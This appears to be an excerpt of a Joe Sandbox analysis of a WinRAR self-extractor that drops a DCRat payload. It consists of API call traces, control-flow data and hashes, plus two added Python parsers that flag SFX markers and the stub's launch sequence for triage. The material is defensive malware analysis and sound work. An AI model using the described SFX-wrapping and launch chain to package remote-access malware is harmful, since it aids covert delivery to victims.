25999->25405 26001 31b1d2 78 API calls 26000->26001 26002 31208f 26001->26002 26003 311ad3 116 API calls 26002->26003 26006 3120ac 26002->26006 26004 31209c 26003->26004 26004->26006 26007 311397 74 API calls 26004->26007 26006->25413 26006->25414 26007->26006 26152 32d8d8 98 API calls 4 library calls 26194 334bd0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 26009 31acd4 26012 31acde 26009->26012 26010 31ae2c 
SetFilePointer 26011 31ae49 GetLastError 26010->26011 26014 31acf4 26010->26014 26011->26014 26012->26010 26013 31ae05 26012->26013 26012->26014 26015 31aa7a 79 API calls 26012->26015 26013->26010 26015->26013 26126 33b8c0 21 API calls 26127 339cc0 7 API calls ___scrt_uninitialize_crt 26172 33c2c0 FreeLibrary 26155 343dc0 VariantClear 26195 3403c0 51 API calls 26060 32dfcc 26061 32dfd5 GetTempPathW 26060->26061 26072 32d8d8 _wcslen _wcsrchr 26060->26072 26066 32dff5 26061->26066 26063 314a20 _swprintf 51 API calls 26063->26066 26064 32e54f 26065 31b4c1 3 API calls 26065->26066 26066->26063 26066->26065 26067 32e02c SetDlgItemTextW 26066->26067 26070 32e049 26067->26070 26067->26072 26069 32dbac SetWindowTextW 26069->26072 26070->26072 26074 32e12f EndDialog 26070->26074 26072->26064 26072->26069 26075 33521e 22 API calls 26072->26075 26077 32d99a SetFileAttributesW 26072->26077 26081 32d9b4 __cftof _wcslen 26072->26081 26091 323316 CompareStringW 26072->26091 26092 32b65d GetCurrentDirectoryW 26072->26092 26094 31b9ca 6 API calls 26072->26094 26095 31b953 FindClose 26072->26095 26096 32c67e 76 API calls 2 library calls 26072->26096 26097 32c504 ExpandEnvironmentStringsW 26072->26097 26074->26072 26075->26072 26079 32da54 GetFileAttributesW 26077->26079 26077->26081 26079->26072 26082 32da66 DeleteFileW 26079->26082 26081->26072 26083 32dd76 GetDlgItem SetWindowTextW SendMessageW 26081->26083 26087 32ddb6 SendMessageW 26081->26087 26090 32da30 SHFileOperationW 26081->26090 26093 31cdc0 51 API calls 2 library calls 26081->26093 26082->26072 26084 32da77 26082->26084 26083->26081 26085 314a20 _swprintf 51 API calls 26084->26085 26086 32da97 GetFileAttributesW 26085->26086 26086->26084 26088 32daac MoveFileW 26086->26088 26087->26072 26088->26072 26089 32dac4 MoveFileExW 26088->26089 26089->26072 26090->26079 26091->26072 26092->26072 26093->26081 26094->26072 26095->26072 26096->26072 26097->26072

Control-flow Graph

APIs
  • Part of subcall function 00321B83: GetModuleHandleW.KERNEL32(kernel32), ref: 00321B9C
  • Part of subcall function 00321B83: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00321BAE
  • Part of subcall function 00321B83: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00321BDF
  • Part of subcall function 0032B65D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0032B665
  • Part of subcall function 0032BD1B: OleInitialize.OLE32(00000000), ref: 0032BD34
  • Part of subcall function 0032BD1B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0032BD6B
  • Part of subcall function 0032BD1B: SHGetMalloc.SHELL32(0035A460), ref: 0032BD75
• GetCommandLineW.KERNEL32 ref: 0032F09B
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0032F0C5
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 0032F0D6
• UnmapViewOfFile.KERNEL32(00000000), ref: 0032F127
  • Part of subcall function 0032ED2E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0032ED44
  • Part of subcall function 0032ED2E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0032ED80
  • Part of subcall function 00320752: _wcslen.LIBCMT ref: 00320776
• CloseHandle.KERNEL32(00000000), ref: 0032F12E
• GetModuleFileNameW.KERNEL32(00000000,00370CC0,00000800), ref: 0032F148
• SetEnvironmentVariableW.KERNELBASE(sfxname,00370CC0), ref: 0032F154
• GetLocalTime.KERNEL32(?), ref: 0032F15F
• _swprintf.LIBCMT ref: 0032F19E
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0032F1B3
• GetModuleHandleW.KERNEL32(00000000), ref: 0032F1BA
• LoadIconW.USER32(00000000,00000064), ref: 0032F1D1
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9D0,00000000), ref: 0032F222
• Sleep.KERNEL32(?), ref: 0032F250
• DeleteObject.GDI32 ref: 0032F289
• DeleteObject.GDI32(?), ref: 0032F299
• CloseHandle.KERNEL32 ref: 0032F2DC
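The APIs list above is the raw trace Joe Sandbox emits for one function of the SFX stub. The Python below is an added example, not part of the report or of Joe Sandbox: it parses entries in that exact line format into records and pulls out the markers a WinRAR SFX wrapper leaves in a trace (the sfx* environment variables, the winrarsfxmappingfile.tmp mapping name and the STARTDLG dialog template), which answers the first triage question for this sample, namely whether the outer executable is a stock SFX stub or the payload itself. SAMPLE_APIS is a constructed copy of entries from the list above; the marker set and the looks_like_winrar_sfx heuristic are this example's own assumptions, not Joe Sandbox output.

```python
"""Parse Joe Sandbox 'APIs' entries and extract WinRAR SFX stub markers.

Added example; not part of the Joe Sandbox report. The input format is the
one shown in the report: an optional 'Part of subcall function XXXX:' prefix,
then Api.MODULE, optional (args), then 'ref: XXXX'.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: entries copied from the report's APIs section.
SAMPLE_APIS = """
  • Part of subcall function 00321B83: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00321BAE
  • Part of subcall function 0032B65D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0032B665
• GetCommandLineW.KERNEL32 ref: 0032F09B
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0032F0C5
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 0032F0D6
  • Part of subcall function 0032ED2E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0032ED44
  • Part of subcall function 0032ED2E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0032ED80
  • Part of subcall function 00320752: _wcslen.LIBCMT ref: 00320776
• SetEnvironmentVariableW.KERNELBASE(sfxname,00370CC0), ref: 0032F154
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0032F1B3
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9D0,00000000), ref: 0032F222
• DeleteObject.GDI32 ref: 0032F289
"""

# One report entry. Entries without an argument list ("GetCommandLineW.KERNEL32 ref: ...")
# have no comma before "ref:", so both the parentheses and the comma are optional.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                          # address of the call site
    subcall_of: Optional[int] = None  # set when the entry came from a callee


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn report lines into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings, blank lines, anything that is not an API entry
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16),
                             int(sub, 16) if sub else None))
    return calls


# Markers taken from the entries above (assumed here to characterise a WinRAR SFX
# stub): the named file mapping the stub opens and the environment variables it
# exports before running the embedded setup command.
SFX_MAPPING_NAME = "winrarsfxmappingfile.tmp"
SFX_ENV_VARS = {"sfxcmd", "sfxpar", "sfxname", "sfxstime"}


def sfx_markers(calls: List[ApiCall]) -> dict:
    """Collect env-var names, mapping names and dialog templates from a call list."""
    env_vars = sorted({c.args[0] for c in calls
                       if c.api == "SetEnvironmentVariableW" and c.args})
    mappings = sorted({c.args[2] for c in calls
                       if c.api == "OpenFileMappingW" and len(c.args) >= 3})
    dialogs = sorted({c.args[1] for c in calls
                      if c.api == "DialogBoxParamW" and len(c.args) >= 2})
    return {"env_vars": env_vars, "mappings": mappings, "dialogs": dialogs}


def looks_like_winrar_sfx(calls: List[ApiCall]) -> bool:
    """Heuristic (assumption): either marker set alone is enough to flag the stub."""
    m = sfx_markers(calls)
    return SFX_MAPPING_NAME in m["mappings"] or SFX_ENV_VARS <= set(m["env_vars"])


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_APIS)
    print(f"{len(parsed)} API entries parsed")
    print(sfx_markers(parsed))
    print("WinRAR SFX stub:", looks_like_winrar_sfx(parsed))
```

Run against the full APIs list of every function in a report, the same parser lets you separate the stub's own activity (dialog, extraction, environment setup) from what the dropped payload does after ShellExecuteExW, which is where the DCRat-specific behaviour flagged in the signatures actually starts.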
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$p05$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3014515783-634705955
                                                                                              • Opcode ID: f797fef7e606a0a7b10f90835ba10b4efe5ca53e2dcf2e4ce64736a0660dbea7
                                                                                              • Instruction ID: 3bc3d90bb991313550a3ccc41dafc2dbc90537a2a49fb6014d13db1e757a223b
                                                                                              • Opcode Fuzzy Hash: f797fef7e606a0a7b10f90835ba10b4efe5ca53e2dcf2e4ce64736a0660dbea7
                                                                                              • Instruction Fuzzy Hash: 72611A75500320AFD323ABA5FC49F6B7BECEB49745F000439F5459B2A1DB74A884CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph (rendered graph not reproduced; executed/not-executed colouring lost in extraction)
                                                                                              • Function 0031BA94 - 0031BC0A: directory enumeration loop; blocks 31baba and 31badd call FindFirstFileW, block 31bb20 calls FindNextFileW, blocks 31baf7 and 31bb2b call GetLastError, block 31bb3b calls subfunctions 32192f, 31d71d and 322924 (three times) before the exit block 31bbfd
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BABD
                                                                                                • Part of subcall function 0031CF32: _wcslen.LIBCMT ref: 0031CF56
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BAEB
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BAF7
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BB21
                                                                                              • GetLastError.KERNEL32(?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BB2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              • Opcode ID: fb700d7706f21ac4fe34dd8249a19c03c6fc5d21969bbc444a49d6114f780d7d
                                                                                              • Instruction ID: 65170da8c475e69a88d4f477f65d44e52f31e214ae40dd6fbbaa8295cae68eb8
                                                                                              • Opcode Fuzzy Hash: fb700d7706f21ac4fe34dd8249a19c03c6fc5d21969bbc444a49d6114f780d7d
                                                                                              • Instruction Fuzzy Hash: 14416F76600519ABCB2ADF64DC84AE9F3B8FB49350F1042A6E56ED7210D7346ED4CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 003192CB
                                                                                                • Part of subcall function 0031D656: _wcsrchr.LIBVCRUNTIME ref: 0031D660
                                                                                                • Part of subcall function 0031CAA0: _wcslen.LIBCMT ref: 0031CAA6
                                                                                                • Part of subcall function 00321907: _wcslen.LIBCMT ref: 0032190D
                                                                                                • Part of subcall function 0031B5D6: _wcslen.LIBCMT ref: 0031B5E2
                                                                                                • Part of subcall function 0031B5D6: __aulldiv.LIBCMT ref: 0031B60E
                                                                                                • Part of subcall function 0031B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0031B615
                                                                                                • Part of subcall function 0031B5D6: _swprintf.LIBCMT ref: 0031B640
                                                                                                • Part of subcall function 0031B5D6: _wcslen.LIBCMT ref: 0031B64A
                                                                                                • Part of subcall function 0031B5D6: _swprintf.LIBCMT ref: 0031B6A0
                                                                                                • Part of subcall function 0031B5D6: _wcslen.LIBCMT ref: 0031B6AA
                                                                                                • Part of subcall function 00314727: __EH_prolog.LIBCMT ref: 0031472C
                                                                                                • Part of subcall function 0031A212: __EH_prolog.LIBCMT ref: 0031A217
                                                                                                • Part of subcall function 0031B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B8FA
                                                                                                • Part of subcall function 0031B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B92B
                                                                                              Strings
                                                                                              • __tmp_reference_source_, xrefs: 00319596
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
                                                                                              • String ID: __tmp_reference_source_
                                                                                              • API String ID: 70197177-685763994
                                                                                              • Opcode ID: 10b350965f5216183548c791254454979db8a051e4ea07f7605dc5a43618ea50
                                                                                              • Instruction ID: 6ba3fd11ed12f8873810c9064d72896a4f6ff933e93243f44253341c58b03a69
                                                                                              • Opcode Fuzzy Hash: 10b350965f5216183548c791254454979db8a051e4ea07f7605dc5a43618ea50
                                                                                              • Instruction Fuzzy Hash: B7A2D871904245AEDF1FDF64C895BE9BBB9BF0D300F0941BAE8499B182D73059C9CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00339186,00000000,0034D570,0000000C,003392DD,00000000,00000002,00000000), ref: 003391D1
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00339186,00000000,0034D570,0000000C,003392DD,00000000,00000002,00000000), ref: 003391D8
                                                                                              • ExitProcess.KERNEL32 ref: 003391EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: 29dc8d89e28a12efef0c6f559481b0ddc057c0b2b46f22b169b7eccfbd90312d
                                                                                              • Instruction ID: c9f88917da05692ca3c933d0679b08ecc32989fe6d24e06c2acc455718250e4e
                                                                                              • Opcode Fuzzy Hash: 29dc8d89e28a12efef0c6f559481b0ddc057c0b2b46f22b169b7eccfbd90312d
                                                                                              • Instruction Fuzzy Hash: 92E04639000508EFCF236F60DD88B593B2EEB41342F010424F9089E121CB75ED92CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0032C9D5
                                                                                                • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                                • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0032CAC1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032CADF
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 0032CAF2
                                                                                              • TranslateMessage.USER32(?), ref: 0032CB00
                                                                                              • DispatchMessageW.USER32(?), ref: 0032CB0A
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0032CB2D
                                                                                              • EndDialog.USER32(?,00000001), ref: 0032CB50
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 0032CB73
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0032CB8E
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,003445F4), ref: 0032CBA1
                                                                                                • Part of subcall function 0032E598: _wcslen.LIBCMT ref: 0032E5C2
                                                                                              • SetFocus.USER32(00000000), ref: 0032CBA8
                                                                                              • _swprintf.LIBCMT ref: 0032CC07
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0032CC6A
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0032CC92
                                                                                              • GetTickCount.KERNEL32 ref: 0032CCB0
                                                                                              • _swprintf.LIBCMT ref: 0032CCC8
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 0032CCFA
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0032CD4D
                                                                                              • _swprintf.LIBCMT ref: 0032CD84
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 0032CDD8
                                                                                              • GetCommandLineW.KERNEL32 ref: 0032CDEE
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00361482,00000400,00000001,00000001), ref: 0032CE45
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0032CE6D
                                                                                              • WaitForInputIdle.USER32(?,00002710), ref: 0032CEA1
                                                                                              • Sleep.KERNEL32(00000064), ref: 0032CEB5
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000421C,00361482,00000400), ref: 0032CEDE
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0032CEE7
                                                                                              • _swprintf.LIBCMT ref: 0032CF1A
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0032CF79
                                                                                              • SetDlgItemTextW.USER32(?,00000065,003445F4), ref: 0032CF90
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 0032CF99
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0032CFA8
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0032CFB7
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0032D064
                                                                                              • _wcslen.LIBCMT ref: 0032D0BA
                                                                                              • _swprintf.LIBCMT ref: 0032D0E4
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0032D12E
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0032D148
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 0032D151
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0032D167
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 0032D181
                                                                                              • SetWindowTextW.USER32(00000000,0036389A), ref: 0032D1A3
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0032D203
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0032D216
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7B0,00000000,?), ref: 0032D2B9
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0032D393
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0032D3D5
                                                                                                • Part of subcall function 0032D884: __EH_prolog.LIBCMT ref: 0032D889
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0032D3F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$MessageText$Send$Window_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellSleepTickTranslateUnmapWait__vswprintf_c_l
                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$lb4$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3103142498-803204324
                                                                                              • Opcode ID: 61a99464e575964e3b8b6d795e1300070900edd3019efbad14ee4775acb745c6
                                                                                              • Instruction ID: b75881717157ab94054eeeafd02334ec97c215546675ba61cb8a3be52316292d
                                                                                              • Opcode Fuzzy Hash: 61a99464e575964e3b8b6d795e1300070900edd3019efbad14ee4775acb745c6
                                                                                              • Instruction Fuzzy Hash: 2342E871940364BEEB239BB4FC4AFFE77ACAB01701F044154F644AA1E2CBB45985CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
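Added example (not part of the Joe Sandbox report, and not WinRAR's or the sample's code): a Python parser for the "• Api.MODULE(args), ref: ADDR" entries used in the API lists above, run on a constructed copy of the launch-routine entries from function 0032C9D5. It recovers the named file mapping (winrarsfxmappingfile.tmp) and the CreateFileMappingW, MapViewOfFile, ShellExecuteExW, WaitForInputIdle, UnmapViewOfFile, CloseHandle sequence the SFX stub uses around spawning its child. Ordering is by reference address, i.e. code layout as the report lists it, not observed execution order; the LAUNCH_CHAIN tuple, the regular expression and all function names are this example's own assumptions.

```python
"""Parse Joe Sandbox style API-reference lines and locate the SFX launch chain.

Added example; the sample lines below are a constructed copy of entries
shown in the report for function 0032C9D5, not output of the tool.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the exact shape the report uses ('• Api.MODULE(args), ref: ADDR').
SAMPLE_LINES = """\
• CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 0032CDD8
• GetCommandLineW.KERNEL32 ref: 0032CDEE
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00361482,00000400,00000001,00000001), ref: 0032CE45
• ShellExecuteExW.SHELL32(0000003C), ref: 0032CE6D
• WaitForInputIdle.USER32(?,00002710), ref: 0032CEA1
• Sleep.KERNEL32(00000064), ref: 0032CEB5
• UnmapViewOfFile.KERNEL32(?,?,0000421C,00361482,00000400), ref: 0032CEDE
• CloseHandle.KERNEL32(00000000), ref: 0032CEE7
  • Part of subcall function 0032E598: _wcslen.LIBCMT ref: 0032E5C2
"""

# Assumed line grammar: optional 'Part of subcall function XXXXXXXX:' prefix,
# Api.MODULE, optional (args), optional comma, then 'ref: ADDR'.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: tuple
    ref: int                 # address of the call site
    subcall: Optional[int]   # address of the subfunction, if the entry is indented as one


def parse_api_lines(text: str) -> List[ApiRef]:
    """Return the parsed entries sorted by call-site address; non-matching lines are skipped."""
    refs = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m is None:
            continue  # section headers such as 'Strings' or 'Memory Dump Source'
        args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
        sub = int(m["sub"], 16) if m["sub"] else None
        refs.append(ApiRef(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return sorted(refs, key=lambda r: r.ref)


# Assumed chain (hypothetical constant): the order in which the stub's direct
# calls appear in the report for the named-mapping plus ShellExecuteExW launch.
LAUNCH_CHAIN = ("CreateFileMappingW", "MapViewOfFile", "ShellExecuteExW",
                "WaitForInputIdle", "UnmapViewOfFile", "CloseHandle")


def find_launch_chain(refs: List[ApiRef]) -> Optional[List[ApiRef]]:
    """Match LAUNCH_CHAIN as a subsequence of the function's own (non-subcall) calls.

    Returns the matched entries in address order, or None if any step is missing.
    """
    matched, i = [], 0
    for r in refs:
        if r.subcall is None and i < len(LAUNCH_CHAIN) and r.api == LAUNCH_CHAIN[i]:
            matched.append(r)
            i += 1
    return matched if i == len(LAUNCH_CHAIN) else None


def mapping_name(refs: List[ApiRef]) -> Optional[str]:
    """Last argument of CreateFileMappingW (lpName) when the report resolved it to a string."""
    for r in refs:
        if r.api == "CreateFileMappingW" and r.args:
            return r.args[-1]
    return None


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    print("mapping:", mapping_name(parsed))
    for step in find_launch_chain(parsed) or []:
        print(f"{step.ref:08X} {step.api}.{step.module}")
```

Because every WinRAR SFX stub performs this same sequence, a detection keyed on ShellExecuteExW alone would fire on benign self-extractors; pairing the chain with the mapping name and the command-line template `-el -s2 "-d%s" "-sp%s"` listed under String ID above identifies the stub, while the dropped payload, not the stub, is what carries the DCRat behaviour flagged elsewhere in this report.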

                                                                                              Control-flow Graph (rendered graph not reproduced; executed/not-executed colouring lost in extraction)
